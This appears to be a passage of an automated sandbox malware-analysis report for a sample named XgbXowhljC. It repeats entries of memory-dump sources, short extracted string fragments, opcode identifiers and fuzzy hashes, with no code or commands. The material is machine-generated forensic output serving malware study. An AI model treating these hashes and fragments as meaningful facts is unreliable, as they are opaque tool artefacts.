                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9$P$TX@$Z$o$`@
                                                                                        • API String ID: 0-570401890
                                                                                        • Opcode ID: c59cc0589e701b609baa57fc46eb9e8803969c48916786af096730894a9623dd
                                                                                        • Instruction ID: ea8f509ab24611ea4d5324bb326b7a2738f2309239e9417ae11b2dee5cff386c
                                                                                        • Opcode Fuzzy Hash: c59cc0589e701b609baa57fc46eb9e8803969c48916786af096730894a9623dd
                                                                                        • Instruction Fuzzy Hash: 11422FB5910608DBDB14DFA0DE48BDDB7B5FB44304F1081AEE606B72A0DB785A89CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@$$@$T@$T@$d$t@
                                                                                        • API String ID: 0-3973645323
                                                                                        • Opcode ID: f76e46e67b032d390e4d270a16b17502feea2b8a85a5cdd9cc334175c25a1a20
                                                                                        • Instruction ID: dd7808f41fa8c0eeeb8498d0c7b95f39f6eab288042ebefad56573b5168ff57f
                                                                                        • Opcode Fuzzy Hash: f76e46e67b032d390e4d270a16b17502feea2b8a85a5cdd9cc334175c25a1a20
                                                                                        • Instruction Fuzzy Hash: 012207B5D00208DBDB14DFE0DD48BEEB7B8BB48304F10856AE506BB2A4EB745A49CF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $j@$$j@$J$xj@$xj@
                                                                                        • API String ID: 0-3795750114
                                                                                        • Opcode ID: 29b5d860587b19e39a0a78acbe0be446abb257bc4d87f53bf6e92e3b0d0a9084
                                                                                        • Instruction ID: 6e4578b8143c235f665be6b5056b9394ccae0c7b64b28781fa3c6cf98c53bfd7
                                                                                        • Opcode Fuzzy Hash: 29b5d860587b19e39a0a78acbe0be446abb257bc4d87f53bf6e92e3b0d0a9084
                                                                                        • Instruction Fuzzy Hash: CEA20774901228CFDB24DF64DD88BD9B7B5BB89300F1081EAE50AB7260DB745AC9CF59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $j@$$j@$J$xj@$xj@
                                                                                        • API String ID: 0-3795750114
                                                                                        • Opcode ID: ae3b1c439437dfb889132403140e6c841fcd2eb7c509f028fffbe4ca1f5b2661
                                                                                        • Instruction ID: 7d83ba14c33e25c57b06654f82dd50372809f523bbc084aa682785b92fec1393
                                                                                        • Opcode Fuzzy Hash: ae3b1c439437dfb889132403140e6c841fcd2eb7c509f028fffbe4ca1f5b2661
                                                                                        • Instruction Fuzzy Hash: 1F820774A11228DFDB24CF54DD84BE9B7B5BB89300F1081EAE50AB7260DB745AC9CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-3115596615
                                                                                        • Opcode ID: a7505f40eb5c87957d452d50a37c106f3671e217cb8b996e77df24c3ab496a56
                                                                                        • Instruction ID: 0aff88c405747ae49392ec6cea733226a2ca0702a0d49b616347433ccb3aca6e
                                                                                        • Opcode Fuzzy Hash: a7505f40eb5c87957d452d50a37c106f3671e217cb8b996e77df24c3ab496a56
                                                                                        • Instruction Fuzzy Hash: 39F23C74910209DFDB14DFA4DD88AEEB7B5FB48300F1081AEE506B72A4DB749989CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-424797338
                                                                                        • Opcode ID: e8de621715178ab71f48e5e053ba954f61952f73b1fd7c015dfd8bfa3592b313
                                                                                        • Instruction ID: 0887818eda884fefa293a5a39dc3afc720f8d23f278cb9a19ff1bbbf1977a3c1
                                                                                        • Opcode Fuzzy Hash: e8de621715178ab71f48e5e053ba954f61952f73b1fd7c015dfd8bfa3592b313
                                                                                        • Instruction Fuzzy Hash: 2AE25B74910208DFDB14DF94DD88AEEB7B5FB49300F20816EE506B72A4DB74A989CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-424797338
                                                                                        • Opcode ID: 64ec57cec899ef7da02cb7f00427a2033e2e3f9b60be90481794469dddfcf89b
                                                                                        • Instruction ID: 2c2188422eee94a94cd2461ad7a5741f1235ff970ad26cb30f8ece74f5dd2c32
                                                                                        • Opcode Fuzzy Hash: 64ec57cec899ef7da02cb7f00427a2033e2e3f9b60be90481794469dddfcf89b
                                                                                        • Instruction Fuzzy Hash: E9E24A75910208DFDB14DF94DD88AEEB7B5FB48300F20816EE506B72A4DB74A989CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :@$6:@$d@$h9@$x9@
                                                                                        • API String ID: 0-3421527952
                                                                                        • Opcode ID: 4b72653663b6e768bd9d2e603a81023ecefbab04f1b981647955fc70476059e7
                                                                                        • Instruction ID: 50fd94e6cbfad0ad74ccdba510aba3135a62df39b13d62bf9932d455abba2249
                                                                                        • Opcode Fuzzy Hash: 4b72653663b6e768bd9d2e603a81023ecefbab04f1b981647955fc70476059e7
                                                                                        • Instruction Fuzzy Hash: 6D51E7B2D0020CABDB04EFA5DD859DEBBB9FF58704F10852AE502B3154EA34AA45CF64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D]@$D]@$D]@
                                                                                        • API String ID: 0-2617234468
                                                                                        • Opcode ID: d0b4626022a74d7db5932eb756fdfd3c333593cd5b25e93ee794915de4b92365
                                                                                        • Instruction ID: 97a9299f1ddc39dab798ebdd237f5567ff6815621847c6dca89605a29430b381
                                                                                        • Opcode Fuzzy Hash: d0b4626022a74d7db5932eb756fdfd3c333593cd5b25e93ee794915de4b92365
                                                                                        • Instruction Fuzzy Hash: 62B20775900218DBDB14DFD0DD98ADEB7B8BF48304F1081AAE506BB264EB746A4ACF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$D]@$g
                                                                                        • API String ID: 0-2680357248
                                                                                        • Opcode ID: bdb62959b6a13f689e9e66de1d6557382f0ab51b5940c3833e91f8cd3ee150d2
                                                                                        • Instruction ID: 747b77d691e9adf450866458d98fc57aee54cc3503dfdc081857b001a99e6dcb
                                                                                        • Opcode Fuzzy Hash: bdb62959b6a13f689e9e66de1d6557382f0ab51b5940c3833e91f8cd3ee150d2
                                                                                        • Instruction Fuzzy Hash: 01820C75900218DFDB14DFA0DD88BDEBBB8FB48305F1085A9E50AB72A0DB745A89CF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P(@$|Z@$|Z@
                                                                                        • API String ID: 0-1979765971
                                                                                        • Opcode ID: 0f4099ee454430e739349a48d0df1832bde3d3fb34f0e6cf12956163faa140cf
                                                                                        • Instruction ID: 775a2d37c965874c2ce4b691afe84a0770470b0689e2148d7c07e88400d90d81
                                                                                        • Opcode Fuzzy Hash: 0f4099ee454430e739349a48d0df1832bde3d3fb34f0e6cf12956163faa140cf
                                                                                        • Instruction Fuzzy Hash: 5761D4B5C01208DBDB00DFD0DA48BDEBBB8FB48305F10856AE556B72A4DBB45A49CF64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <`@$|Z@
                                                                                        • API String ID: 0-3868924504
                                                                                        • Opcode ID: 9662126c2a3f4bce188696e4d4fe6a1fda1f55ff100a2e751a4ed470357ed78d
                                                                                        • Instruction ID: b1b00b43a5f693e32b7903b0add70f6b8c4bb62e61ae0248a843be21741c9fb7
                                                                                        • Opcode Fuzzy Hash: 9662126c2a3f4bce188696e4d4fe6a1fda1f55ff100a2e751a4ed470357ed78d
                                                                                        • Instruction Fuzzy Hash: 19610B75900218EFCB04DF94D998AEDBBB5FF48304F1081A9F60AB72A0DB745A89CF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <`@$|Z@
                                                                                        • API String ID: 0-3868924504
                                                                                        • Opcode ID: 9fe7e4887b8505bbf7ead8395dc4f923a8f06f276a629457ce9b4c7671ce9a66
                                                                                        • Instruction ID: 7e61d0d1989918ee1e00c8c8e38fefc994992c61de94b045daf328d51a29c78b
                                                                                        • Opcode Fuzzy Hash: 9fe7e4887b8505bbf7ead8395dc4f923a8f06f276a629457ce9b4c7671ce9a66
                                                                                        • Instruction Fuzzy Hash: F061FA75900218EFCB04DF94D998AEDBBB5FF48704F1081A9F60AB72A0DB745A89CF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: |Z@$|Z@
                                                                                        • API String ID: 0-124865514
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: >$\@$t@$t@
                                                                                        • API String ID: 0-397992017
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4$I$Xa@$da@
                                                                                        • API String ID: 0-1532661933